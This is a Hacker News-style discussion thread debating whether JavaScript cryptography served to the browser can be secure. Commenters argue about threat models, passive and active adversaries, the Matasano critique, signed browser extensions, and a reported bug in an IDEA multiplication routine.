I thought this was a good post, but I wasn't impressed with the criticisms of other blog posts. Okay, perhaps I'm biased, because I wrote one of them, but how about I try to defend the other?
Perhaps the most objectionable thing about the Matasano article is title. Otherwise it does a very good job of criticizing a particular way of engineering web cryptography that is, for lack of a better term, total bullshit. But is the approach criticized in the Matasano post used in the real world?
Let's try an experiment! Go to google.com and type in "encrypted chat"
If your results are similar to mine, one of the top 3 results will be "chatcrypt.com". Let's read the "How It Works?" page:
> Most people thinks that if a website uses a HTTPS connection (especially with the green address bar) then their "typed-in" informations are transmitted and stored securely. This is only partially true. The transmission is encrypted well, so no third party can sniff those informations, but there is no proof that the website owners will handle them with maximum care, not mentioning that the suitable laws can enforce anyone to serve stored data for the local authorities.
Okay, so this site attempts to implement end-to-end encryption in a web browser. Except... what's the problem? Oh, it looks like chatcrypt.com isn't served over HTTPS. In fact, if we try to visit the site over HTTPS, it doesn't work at all.
chatcrypt.com claims to keep your traffic secure using end-to-end cryptography implemented in JavaScript, except the JavaScript is being served in plaintext and is therefore easily MitMable.
Top 3 Google result for "encrypted chat"
Is the Matasano post that unreasonable? (besides the title) It pretty much describes that sort of site to a tee.
I mean, it is secure against passive adversaries... but that's nit-picking.
ChatCrypt has made a large number of mistakes, though, I concur. They don't use HTTPS, it isn't open sourced, and the developer is practically anonymous.
I would still maintain that Matasano's article is problematic, though, because it has one of two effects on the reader:
1. The reader is more-than-well convinced on faulty basis that JS crypto should never be used.
2. The reader is still adamant on continuing their project, but is now alienated from a source that could have offered a plethora of helpful advice. (Example: "Please, for all that is good, use HTTPS.")
Of course, nothing will prevent the occasional surfacing of bad crypto, but their article certainly doesn't help any of its causes.
How about, instead of arguing that readers of an article are more convinced than they should be about something you yourself appear to be convinced of, you put your money where your mouth is and formulate an argument for a setting in which content-controlled browser Javascript is a sensible place to deploy cryptography. Give yourself the full benefit of every facility the web programming model gives you, up to the limit of installing browser extensions (at which point you're no longer talking about content-controlled code). What's a system like this that has worked well, and would be resilient to a determined adversary?
1) formulate an argument for a setting in which content-controlled browser Javascript is a sensible place to deploy cryptography.
1.a) Give yourself the full benefit of every facility the web programming model gives you, up to the limit of installing browser extensions.
2) What's a system like (1) that has worked well, and would be resilient to a determined adversary?
So, he's claiming to have shown that content-controlled browser javascript crypto is worse that useless because it allows good people to inadvertently leak secrets. All you have to do to prove him wrong is just tell him a use case where it would make sense and then cite an example where that worked well* and would be resilient to a determined* adversary.
So, all you have to do is say "chatcrypt.com's use case makes sense and chatcrypt rocks. Here I show that it is unbreakable until long after the stars cool, and no amount of kneecap cryptography will lessen the adversery's burden."
* He's giving you two wiggle words already, you can define them however you'd like.
He means crypto from servers can't be trusted. You need something better. You need crypto running in a browser extension.
If I understood your article correctly, when you (bren2013) refer to in-browser crypto you mean crypto code is delivered from the server. But that's not the only in-browser crypto you can get. You can also get in-browser crypto delivered from a browser extension. Under this second definition of in-browser crypto, the following sentence in the article isn't accurate:
there is nothing in-browser crypto can do to defend against active adversaries.
A construction or implementation is secure if an adversary, given a certain level of power, is unable to achieve a given objective. The level of power an adversary is assumed to have and their ultimate objective is called the threat model.
If a new construction is secure under a new threat model that either increases the amount of power an adversary can have or makes the adversary's objective broader, the new construction is said to have a higher level of security.
This is what we need more in security discussions. So many discussions, here on HN but also, well, everywhere, are really misunderstandings about which threat model to assume. People get into hot-headed fights about whether some solution somewhere is or is not "secure", when really all they disagree about is which definition of "secure" to use.
Well done! I propose that security related blog posts take some time out to casually define these terms over and over again, for a while, until we can all just assume them known and be done with all the vague imprecise nonsense.
This sounds important, but the distinction between "passive" and "active" attackers has come up in every discussion of JS crypto I can remember on HN, and indeed in every discussion of TLS (see, for instance, every discussion of why certificate authorities are necessary and why self-signed certificates are insecure "despite using exactly the same cryptography as CA-signed certificates").
I do not believe this is a dimension that has been missing from previous discussions, but perhaps you can use the search bar below to find a debate about JS crypto where it was missing and where the result was misleading to readers.
> but perhaps you can use the search bar below to find a debate about JS crypto where it was missing and where the result was misleading to readers.
Oh come on, was that sneer called for? If you really feel that none of the security discussions here on HN are getting way out of hand over what's really a misunderstanding on some basic assumptions, then you haven't been looking. Note, I didn't say "JS crypto discussions", I said "security discussions".
In fact, I'm mostly referring to the kinds of discussions that did not start as a security topic, but evolved into them. There, there's often people like me, who care about security but who are far from experts, and these people (myself included) often mix stuff up. Clearing out definitions and which threat model to assume would really help in such discussions. I thought that this blog post did that in a very clear and non-opinionated way in that little paragraph there, so I complimented it.
I suppose I'm expected to give a full-throated defense of the Matasano post, which I wrote, but I'm not going to. While I don't dislike the post as much as this author appear to, I don't much like it either. I wrote it in a single draft, all at once, as a sort of message board comment I'd write once and maybe in the future refer back to. I didn't promote it on HN and I'm not the reason it keeps getting cited.
None of this bickering changes a simple truth: when a web mail provider claims to provide "NSA-proof" end-to-end encryption, hosted in Switzerland just to be safe, using software that you don't have to install on your computers at all, then you need to assume that web mail provider can read your email, and so can anyone who can coerce that provider into doing something. If you believe that --- and you should --- then I don't care what you think about the rest of the Matasano article.
> None of this bickering changes a simple truth: when a web mail provider claims to provide "NSA-proof" end-to-end encryption, hosted in Switzerland just to be safe, using software that you don't have to install on your computers at all, then you need to assume that web mail provider can read your email, and so can anyone who can coerce that provider into doing something. If you believe that --- and you should --- then I don't care what you think about the rest of the Matasano article.
This. The whole article could be replaced with this paragraph, and it couldn't be clearer.
If you think that's the "simple truth," you either didn't read the article, or you have some piece of information you're not sharing with the rest of us.
You also know something about the "formalisms of HBC" (now redacted), and how it doesn't work with browsers that even scholars don't know about.
This comment appears to be totally unresponsive to mine.
Incidentally, the "now redacted" in the parent comment refers to three bullets I had written in the grandparent comment and left for four minutes before realizing that objecting in detail to this person's blog post more or less amounted to making a full-throated defense of the Matasano post. Which, like I said, I'm not in love with either.
One problem with the "passive adversary" attack is that even if the nonce+HMAC protocol defeats the passive adversary, you as a user have no way of verifying whether or not your adversary is passive. Or whether they exist, or, indeed, anything about them, as in the real world, you don't get to pick your adversaries. The user needs a way to determine whether the connection is secure before they can trust it, because they can't (correctly) assume that only passive adversaries exist.
So, if that is the best in-browser crypto can do, then it is still basically useless, unless you get to choose your adversary. And "active adversary" software is off-the-shelf tech, not some sort of bizarre thing only the NSA has access to. Active adversary is the lowest baseline of attack worth talking about.
No, you don't get to pick your adversaries, but you do get to pick the strongest one you wish to be secure against. Or for that matter, can be secure against. I briefly mentioned Diffie-Hellman key exchanges to provide an example of another common primitive that's only secure against passive adversaries. (DHKEs are typically used in peer-to-peer applications.)
Also, if you keep reading, I mention several uses for in-browser crypto.
Let me say it again: As a user, you can't verify that you're secure against the attackers.This is my important point, not whether a particular chosen attack was blocked. Therefore, if you care at all about security, you can't trust the channel. You're only looking from the POV of the attacker, but you've got to consider all the POVs, including the users, and not impute to them knowledge that they can't have about the universe ("I am only being attacked by passive attackers") in order to declare your system "more secure".
Saying "I'm secure against passive attackers" doesn't mean that you're safe doing anything on your "secure" channel, because the bar for active attack is so low that that's hardly saying anything. You can be secure against "passive attackers", but you still can't verify that you haven't been attacked, in general. A definition of security in which a user blithely sticks sensitive data on a channel, unconcerned about whether the channel was attacked, is a useless definition of security... by definition, we're not talking about a user concerned with security, of any kind.
If we are talking about a security scenario where the equivalent of "active attack" is actually quite difficult and it takes a nation-state's resources, I'd be happy to discuss this argument. We've historically used some encryption at points in time where technically brute forcing it was feasible for very large entities, for instance. But the bar for active attack on the web is low here, very, very low.
This is an example of the Perfectionist Fallacy I was talking about in the article.
You can't verify that someone isn't MiTM'ing with a stolen certificate. You can't verify that the CA hasn't been coerced into forging a valid certificate. You can't verify that your government hasn't ordered that computer manufacturers install surveillance devices. That doesn't mean that the internet is unusable.
Some things are vulnerable to active attacks, and if they were attacked, nobody would know. Every cryptographer knows this. It's not a big deal.
I didn't get the impression jerf was arguing for perfect security, as much that they were saying that securing only against a passive attacker is as useful for the user as not using TLS at all.
Selecting a threat model is all well and good, but if you select an artificially easy threat model to defend against then you're not really helping users (in this case, helping them against random evil ISPs?)
"If we are talking about a security scenario where the equivalent of "active attack" is actually quite difficult and it takes a nation-state's resources, I'd be happy to discuss this argument. We've historically used some encryption at points in time where technically brute forcing it was feasible for very large entities, for instance. But the bar for active attack on the web is low here, very, very low."
You expected to see a Perfectionist Fallacy argument, so you saw one. But it's not, because "active attacks" in this context don't require anything close to "perfection" to achieve. It's exactly the other way around... it requires near perfection to prevent them in the real world!
The problem with this argument is that you stop passing the buck when it's convenient for your argument, not to its actual conclusion. The only reality any one of us can actually be sure of is each of our own minds[0], therefore the only way to keep information secure is to never share it. Even then, our brains in vats could be under constant monitoring and decoding, therefore making secrecy a futile exercise altogether.
Because a solipsistic worldview is, perhaps, irrelevant to everyday life, we begin to operate on assumptions based on information that's infeasible for us to know for certain. This is what you must do to talk about security on the Internet: limit the domain of the problem by making assumptions about the Internet's infrastructure. You're right that it will never be possible to share a secret on the Internet without risk, that's not the point of this article or any others that indicate the flaws of JavaScript cryptography.
When you've been reduced to arguing about brains in vats, you're no longer having a technical conversation about security anymore. We're talking about security here.
I read the whole article and the impression I have is that all the uses you have for in-browser crypto in the current web programming model involve resistance to passive-only attackers.
It's not clear to me if the author is endorsing the use of browser crypto in any particular scenario. Regardless, probably the most common reason for wanting browser crypto is to protect the data before it hits the server, thus protecting against a malicious or compromised server.
For example, consider a web-based mail client. You want to send an encrypted message, say via PGP, and you don't want the server to be able to read it, even if the server is evil. You'd like to be able to do the PGP encryption 100% in-browser, with no browser plugins or extensions necessary.
I think that's the most common category of use-case for browser crypto. Unfortunately, it's one where browser crypto plainly doesn't work. The whole point here is to defend against an evil server, but if the server is evil, it will send you evil crypto JS. TLS doesn't help you. Nobody's impersonating the server or altering the JS file in transit. You're getting an authentic copy of the JS file from the real server. It just happens to be an authentic copy of an evil JS file.
Given that, what can you do with browser crypto, practically speaking?
It still might protect you if you won't access server while it's compromised. It protects you from someone just hacking your server, downloading all the data and getting away.
Also you might serve files that do the encryption from different server that's smaller, better protected, more stable, that less people have access to.
> It still might protect you if you won't access server while it's compromised.
The end user can't know when that's the case.
> Also you might serve files that do the encryption from different server that's smaller, better protected, more stable, that less people have access to.
That doesn't provide any assurance to the end user that the JS isn't malicious.
Remember, "compromise" doesn't just refer to a drive-by hack. The site operators themselves may become compromised (or start that way), and deliberately serve malicious JS. Users can't know when that's the case. When it is the case, the strategy you suggested offers no protection, because the "more secure" JS server is still under the control of the bad actor.
>> It still might protect you if you won't access server while it's compromised.
> The end user can't know when that's the case.
Yes. I didn't say that user can know if he is protected. Just that he is when this condition is met.
> Remember, "compromise" doesn't just refer to a drive-by hack. The site operators themselves may become compromised (or start that way), and deliberately serve malicious JS. Users can't know when that's the case. When it is the case, the strategy you suggested offers no protection, because the "more secure" JS server is still under the control of the bad actor.
Didn't you just do what OP criticizes? I said it has value in some scenarios assuming some threat model and you countered by showing that it doesn't protect you in some other threat model. When you don't trust the third party the only way to protect yourself is never rely on what they control. Especially never run their software on your machine in a way that has access to your secret data. In that scenario any type of encryption other than built in the browser binary (not supported? risky?) or better yet outside of browser (cumbersome) is pointless.
> > It still might protect you if you won't access server while it's compromised.
> The end user can't know when that's the case.
This is the entire point of the article. You can't know if it's the case, you can't either with any software distribution. When you type 'apt-get install opensshd', how do you know if you're getting the package from an uncompromised server?
You just have to trust that the public keys you got are the right ones, and their private keys have not been stolen.
So what the author is saying is that regarding that aspect web crypto is at roughly the same level.
The big problem of course is that there is evidence that the whole CA system is much less reliable than the old GPG signing party system.
> When you type 'apt-get install opensshd', how do you know if you're getting the package from an uncompromised server?
If you don't take any steps to verify the integrity, then you don't know.
The big difference, as I see it, is that the JS code gets served over and over again to the same clients. Every time you visit the website, it can load a new version of the JS.
Even if you do verify the integrity of the package, then you still can't know for absolute certain that the package maintainer hasn't somehow exposed their private key or been otherwise compromised. You have to trust them.
If the package maintainer has exposed their private key, and yet the package itself in intact, what harm is there (at the moment)? With the key compromised, you could have been MITMed, but you weren't. You could be MITMed in the future, but that's a problem for another day.
I just saw this reply, and I have to clarify: the moment the maintainer's key is compromised, it becomes possible for someone to MITM. It's not clear if that's what you were saying, but that's how it is, and that's absolutely a problem as soon as the key is compromised (particularly if he/she was targeted).
Server-side crypto protects you from someone just hacking your server and downloading the data too.
Serving from a smaller and more protected server is interesting, but you'd have to serve at least the HTML as well as every piece of JavaScript (not just the crypto) which doesn't leave too much room for other stuff. And why not just do the crypto server-side on that smaller, more protected server then?
> but you'd have to serve at least the HTML as well as every piece of JavaScript (not just the crypto
You are right.
> which doesn't leave too much room for other stuff.
Well... HTML and JS can be light and static. Backend stuff is what might require multiple servers, databases and lots of people involved.
> And why not just do the crypto server-side on that smaller, more protected server then?
Because you'd have to pass all of the data that you wan't to secure through it. Besides server-side crypto is surely more complicated and would need more people involved especialy with large volume of data than just serving static files.
lol, This is exactly what I was trying to stop people from doing! I'm not endorsing or damning it--I'm talking about it sensibly and objectively so people can learn to use it properly.
Please read the article again carefully. I think you'll find the answers to your questions.
While you might be formally correct, your criticism still seems about as sensible as criticising someone who said "a tank made of paper sheets is not secure" because they failed to specify a threat model. After all, such a tank would be secure against a paralyzed attacker without weapons.
Yes, it is important to be aware that security is always relative to a threat model, and at times it can lead to confusion when threat models are not made explicit. That does not mean, though, that it's necessarily wrong to imply a sensible threat model in a given context, and to just call something "insecure" without any further explicit qualifications if it does not protect against a reasonable minimal threat model that essentially everyone essentially always has to face.
Also, it's questionable whether you can call the NSA's mass surveillance a passive attack, given that QUANTUM INSERT exists and was used, in order to attack foreign communications infrastructure.
This is also precisely the problem I was trying to avoid by introducing formality.
Is it like saying that a tank made of paper sheets is insecure, or is it like saying that a heavily-armored tank is insecure (against a nuclear weapon)?
It is never okay to omit important information like the threat model in cryptography. That information is essential to the system's analysis.
> Is it like saying that a tank made of paper sheets is insecure
Yes, I'd say it's more like that one. The technology is insecure against threat models it is almost certain to face.
> or is it like saying that a heavily-armored tank is insecure (against a nuclear weapon)?
No, I don't think it's like that one. A tank could realistically participate in a nuclear conflict, but that's not necessarily what a tank is intended for. Whereas, JS crypto is presumably intended to protect users when the remote server can't be trusted. (What else would it be for?) It can't offer such protection.
What about a secret message web widget on a shared computer that uses localstorage as a database and requires the recipient to enter a password to reveal the message, or an offline diary app made with node-webkit that encrypts diary entries? There are lots of uses for JS crypto in cases where information will never leave a local computer. I know that's not what you were saying, but I think it's important to realize that JS has gone beyond remote delivery at this point.
The problem is that with the in-browser use case, which is what this whole discussion is about, the code being executed locally came from a remote source. For all of the reasons that Monsanto and the others name it is impossible to ensure that the code does what it claims to. So even if all of your data is stored locally, you have no strong way to ensure that the code that is performing the cryptographic functions is not secretly compromised by an attacker so that, for example, it sends your data in clear to some remote server.
Even though it often isn't spelled out, this is mostly about content-controlled JS loaded from the web, though the language itself also has its problems. And security-wise that app would not be better than one that stored the messages on a server, which only allows you to read them back when you provide the password.
That's the part to which I'm objecting. As I asked above, what is the proper use of JS crypto? What real-world application do you have in mind where JS crypto's level of security is adequate?
Packaged in a signed browser extension is a good start. Or packaged in a signed desktop app that runs JS to drive the UI (xulrunner, node-webkit, ...).
In general, anywhere you aren't basically doing what amounts to an eval() on an external resource (so packaging everything locally, aggressively filtering XSS attacks) can be a good use of JS crypto.
I don't think JS crypto itself is the issue. I think the issue is more pulling your code from an external, ultimately untrusted source. You can do this in many languages, and it's equally a Terrible Idea in all of them. Granted, some things auto-update and can verify an update via a packaged public key, but the model of continuously downloading code on each run, while easier on app developers, is a ticking time bomb for crypto.
> Packaged in a signed browser extension is a good start. Or packaged in a signed desktop app that runs JS to drive the UI (xulrunner, node-webkit, ...).
Those are probably acceptable in principle. I should have been more specific: I was referring only to the scenario wherein the webserver provides the JS.
Well, now that we have WebRTC, peer-to-peer data transfer is possible in the browser. Perhaps you could imagine a p2p scenario where browser crypto is useful?
One aspect of in-browser functionality OP mentions is "offline". However, browsers are pretty cool in that they can mix offline and online. You can open a local html file and it can then make online requests. Alternatively, you can request an html file online that then can access local files.
This ability to mix offline and online content is something that I think has a lot of potential to improve client-side encryption. Specifically, client-side encryption coupled with an unhosted webapp[1].
I've been exploring this potential for my byoFS[2] project, and made an example end-to-end encrypted chat demo[3]. You can request the app anonymously (or even save it and open it locally). The app then lets the user connect an online datastore (e.g. Dropbox) to save the encrypted chats.
This separates who serves the anonymous static webapp and the authenticated datastore, and makes it much harder to target a javascript attack (the most common attack from the Snowden leaks).
In a project I'm working on [1], I'm planning to provide a browser extension that verifies the source code is digitally signed and that it matches the source code published on GitHub. I believe this creates a pretty good security model for a web-based app, even more so than most desktop programs.
Some more information from the security page [2]:
The browser extension provides improved security by verifying the integrity of the files served by the server. The verification is done using two factors:
- Cold storage signature verification: In addition to SSL, static files (html/css/javascript) are signed using standard Bitcoin message signatures, with a private key that is stored offline and encrypted. This ensures that the content served from the webserver was not tampered with by a third party.
- Comparing against the code on GitHub repository: The source code from the GitHub repository is built on Travis-CI and the resulting hashes are published publicly on Travis's job page. The extension ensures that the content served by the webserver matches the open-source repository on GitHub.
If an attacker gains control over the web server, he still only has access to information the web server already knows (which is very little). To get sensitive information, he would have to modify the client-side code to send back more data to the server.
For an attacker to successfully mount such an attack against someone with the browser extension, he would have to:
- Gain access to the web server.
- Gain access to the personal computer of a developer with commit access to the GitHub repository. [3]
- Commit his changes to the public GitHub repository, where they can be seen by anyone. [3]
- Gain physical access to the offline machine with the private key and know the passphrase used to encrypt it.
So what happens when github goes down? I'd argue a better source for this sort of thing would be to put the hash in dns, either directly in a txt record, or using hacks involving A or AAAA records. Your nameserver almost certainly has more security than your github repo.
That would be really sweet if you could access dns directly in client-side Javascript, particularly given the existance of DNSSEC (great for bootstrapping trust).
Alas, client-side JavaScript doesn't speak DNS. You'd have to go through a server, which would mean you'd lose anything you might gain.
So, you have just made GitHub the trusted third party for the world? After the X.509 CAs have so successfully protected us all these years without a single compromise or other security blunder and nobody is working on ways to get rid of those single points of failure, especially not the people behind certificate patrol or monkey sphere, that must be the best security model ever!
Why do people use styles like these that push all the content uncomfortably to the sides? 40% of the screen is dedicated to what? The blog title and a link home.
- Statically encrypt and publish content on HTTP server
- Transmit these via HTTP to an iframe component at client browser
- transmit decryption and key routines using HTTPS.
- HTTP-iframe locally sends message to HTTPS-iframe via window.postMessage()
- HTTPS-iframe decrypts content (with pre-shared key) and renders it on page
Ten years from now, when web security is even more laughable and anemic than it already is, some of us are going to remember discussions like these where application developers at large ignored the warnings from the established crypto community. Some of us are old enough already to remember this pattern happening before.
I understand the strong reaction to the actions of the NSA, but all this is doing is providing the appearance of security while not making it any more difficult for adversaries like the NSA.
"they just make the task of programming a crypto library a bit more fun and challenging, not riskier"
Seriously? It makes it more difficult to get things right, but the risk of getting it wrong is not increased? And that after you just described how the challenges of JS have already directly led to vulnerabilities?
Also, you mostly don't really support your own argument. How exactly does a malicious server not affect "crypto browser apps"? How does staying out of scope for PCI DSS have anything to do with security (except maybe demonstrating that PCI DSS is crap because it can so easily be circumvented)? Also, in what kind of scenario would leaking info in a referer be a problem, but leaking the same info in encrypted form would not? And how do you guarantee that your verification code is loaded fresh from the server once your application has been compromised in a browser?
> Seriously? It makes it more difficult to get things right, but the risk of getting it wrong is not increased? And that after you just described how the challenges of JS have already directly led to vulnerabilities?
Well it seems that you misunderstood which challenges I was talking about. Lack of types is a big problem, but besides that everything else doesn't make the risk bigger.
> How exactly does a malicious server not affect "crypto browser apps"?
I didn't claim that malicious servers won't be able to affect crypto browser apps. What I said is that in these apps you have to trust the server already, so it doesn't make sense to consider them untrusted.
> How does staying out of scope for PCI DSS have anything to do with security (except maybe demonstrating that PCI DSS is crap because it can so easily be circumvented)?
It's exactly the point. When people say "javavascript crypto is harmful" they don't consider use cases where it's really useful, even just to circumvent PCI DSS.
> Also, in what kind of scenario would leaking info in a referer be a problem, but leaking the same info in encrypted form would not?
I don't understand this question.
> And how do you guarantee that your verification code is loaded fresh from the server once your application has been compromised in a browser?
Because every time I refresh my browser I get a chance to get some trusted code from the server.
> Well it seems that you misunderstood which challenges I was talking about. Lack of types is a big problem, but besides that everything else doesn't make the risk bigger.
So, it isn't actually a bit more challenging then?
Also, it seems to me like you are at least forgetting timing and possibly other side channels.
> I don't understand this question.
I just can't see any actual scenario where that helps, mostly because it seems to me that the cipher text usually would be a plain-text equivalent, so it doesn't really matter to the attacker whether they have the plain text or the cipher text.
> Because every time I refresh my browser I get a chance to get some trusted code from the server.
So, in other words, you don't have a guarantee?
Other than that, and in general, it seems to me that your argument is somewhat of an equivocation fallacy: You are essentially redefining crypto to include kinda-non-crypto, to then claim that this redefined crypto actually can sensibly be used in browser-side JS, and therefore the arguments against the use of the original crypto are somehow not good advice.
I would think that it is rather obviously implied in most criticism of JS crypto that you are not just executing code that performs a cryptographic primitive, but that you are actually using it to achieve some security goal, and in particular that you are using client-side JS rather than some server-side crypto for some security advantage. That is essentially the implied vague threat model.
So, yeah, it's true that there are uses for crypto primitives that aren't affected by that threat model, because they aren't about security at all. And others that are less affected for various reasons. But it's highly misleading to therefore claim that "most applications aren't affected by that threat model". I'd think that most applications actually are. Except for those built by people who do understand enough of cryptography to not need posts such as the one by matasano. That is to say: Yes, once you yourself can write such an FAQ, you might be able to make use of JS crypto. But at that point, that post won't keep you from doing it anyhow. If you can't, though, chances are you first need to understand every single point made in it.
> So, it isn't actually a bit more challenging then?
More challenging, yes. Riskier, no.
I don't like that Javascript doesn't have native support for big integers (like Python does), or that it stores numbers as floating points in a 52-bit mantissa, but I fail to see why this makes developing crypto code riskier.
> Also, it seems to me like you are at least forgetting timing and possibly other side channels.
Well, I ain't. When you don't control the instructions being executed by the CPU you may have the risks of security-sensitive information leaks. This applies not only to Javascript, but also to all scripting languages. I could say that it also applies to Java, if the methods in its BigInteger class aren't fixed-timing.
In other words using Javascript doesn't make the problem any worse. If you disagree, you're invited to take a look at End-To-End, find a side-channel leak and write an exploit for it. You could earn serious cold cash with that finding.
> I just can't see any actual scenario where that helps, mostly because it seems to me that the cipher text usually would be a plain-text equivalent, so it doesn't really matter to the attacker whether they have the plain text or the cipher text.
I described where it helps in my article.
Re your last point: if doing SSH in a browser isn't crypto I don't know what could be. Is the only thing you consider Javascript crypto encrypted webmail? That's your problem then. You know one wrong use case, and you refuse to admit that there are other legitimate ones.
Edit: remove a few unnecessary sentences.
Edit: some people don't like Javascript crypto so much that they downvote me without saying anything.
Please explain. Is it that it is more challenging, but in a way that it's not more difficult to get it right (what exactly is the challenge then?) or is it not riskier because the higher probability of getting it wrong does not decrease the probability of getting it right (how exactly do you increase one probability without decreasing the probability of the negated case?)?
> This applies not only to Javascript, but also to all scripting languages.
So, a bridge built from matches isn't any more robust than a bridge built from toothpicks, therefore building bridges from toothpicks is a good idea (nevermind that other people are using reinforced concrete for bridge construction)? I'm sorry, but I can't quite follow your argument.
> If you disagree, you're invited to take a look at End-To-End, find a side-channel leak and write an exploit for it. You could earn serious cold cash with that finding.
You are not seriously bringing forward the "secure-because-hacking-contest" argument, are you?
> Re your last point: if doing SSH in a browser isn't crypto I don't know what could be.
Sure it is, but it still is rather obviously not what those posts are primarily attacking. Or maybe it is, if anyone claims or implies that this "SSH-client in a browser" is any more secure than "browser frontend to SSH-client on the server". Which I think is kinda the whole reason for its existence? Performance- and complexity-wise, I doubt that it makes any sense at all to implement the SSH protocol itself in the browser in that case, vs. using a native SSH client on the server.
> If you disagree, you're invited to take a look at End-To-End, find a side-channel leak and write an exploit for it. You could earn serious cold cash with that finding.
For one thing, the IDEA implementation seems to be incorrect. In IDEA, multiplication is defined as multiplication modulo 2^16 + 1, where 0 means 2^16 [3]. However, looking at the multiplication function:
When x == 0 but y != 0, the result of the modular multiplication is always 0, when it should not be. The correct code would be (in glorious C syntax, everything unsigned and 32-bit):
if(x != 0) {
if(y != 0) {
return x*y % 65537; // result fits in 32 bits
}
else return 65537 - x; // or 1 - x mod 2^16
} else return 65537 - y; // or 1 - y mod 2^16
Of course, even if correct this code is still vulnerable to timing attacks (under contrived conditions) [1]. This can be worked around using a little bitwise magic:
Additionally, the modular inversion seems to be needlessly complicated by using Euclid's algorithm (and I'm not sure it's correct either: it seems not to respect the "0 means 2^16" rule). Use the usual a^(p-2) mod p inversion trick, using an optimal addition chain [2], to make it simpler, constant-time, and possibly faster.
None of this is Javascript's fault, for what it's worth. But I certainly don't expect Javascript to make it any easier to write correct code, much by the contrary.
I think that the main reason that people keep wanting to do this is that web developers would like to work on this problem but don't have skills that are applicable immediately. It's going to require a great deal of learning on most of their parts that is at least as daunting as becoming a good front-end developer to use existing crypto libraries well...much less engineer new cryptosystems. That would be the difference between being able to code and being able to write a high quality optimizing compiler, for instance. With study and hard work you can use the fruits of the crypto community well...but you have to start by realizing where you are starting from. In browser javascript isn't just another programming language and runtime that's completely akin to c and the c runtime. The Matasano article does a great job of describing why.
No such thing as a secure keystore? He needs to look harder. Aside from hardware which is tamper proof... which exists in smart cards and TPM chips... most operating systems use file system ACL's. Yes running as "root" means you can get the keys... you have to protect them...
You are right, and the fact that people are just dismissing you out of hand is frightening. It shows a lack of even the interest to understand how off-base they are.
The Matasano post is here:
http://matasano.com/articles/javascript-cryptography/
Perhaps the most objectionable thing about the Matasano article is title. Otherwise it does a very good job of criticizing a particular way of engineering web cryptography that is, for lack of a better term, total bullshit. But is the approach criticized in the Matasano post used in the real world?
Let's try an experiment! Go to google.com and type in "encrypted chat"
If your results are similar to mine, one of the top 3 results will be "chatcrypt.com". Let's read the "How It Works?" page:
> Most people thinks that if a website uses a HTTPS connection (especially with the green address bar) then their "typed-in" informations are transmitted and stored securely. This is only partially true. The transmission is encrypted well, so no third party can sniff those informations, but there is no proof that the website owners will handle them with maximum care, not mentioning that the suitable laws can enforce anyone to serve stored data for the local authorities.
Okay, so this site attempts to implement end-to-end encryption in a web browser. Except... what's the problem? Oh, it looks like chatcrypt.com isn't served over HTTPS. In fact, if we try to visit the site over HTTPS, it doesn't work at all.
chatcrypt.com claims to keep your traffic secure using end-to-end cryptography implemented in JavaScript, except the JavaScript is being served in plaintext and is therefore easily MitMable.
Top 3 Google result for "encrypted chat"
Is the Matasano post that unreasonable? (besides the title) It pretty much describes that sort of site to a tee.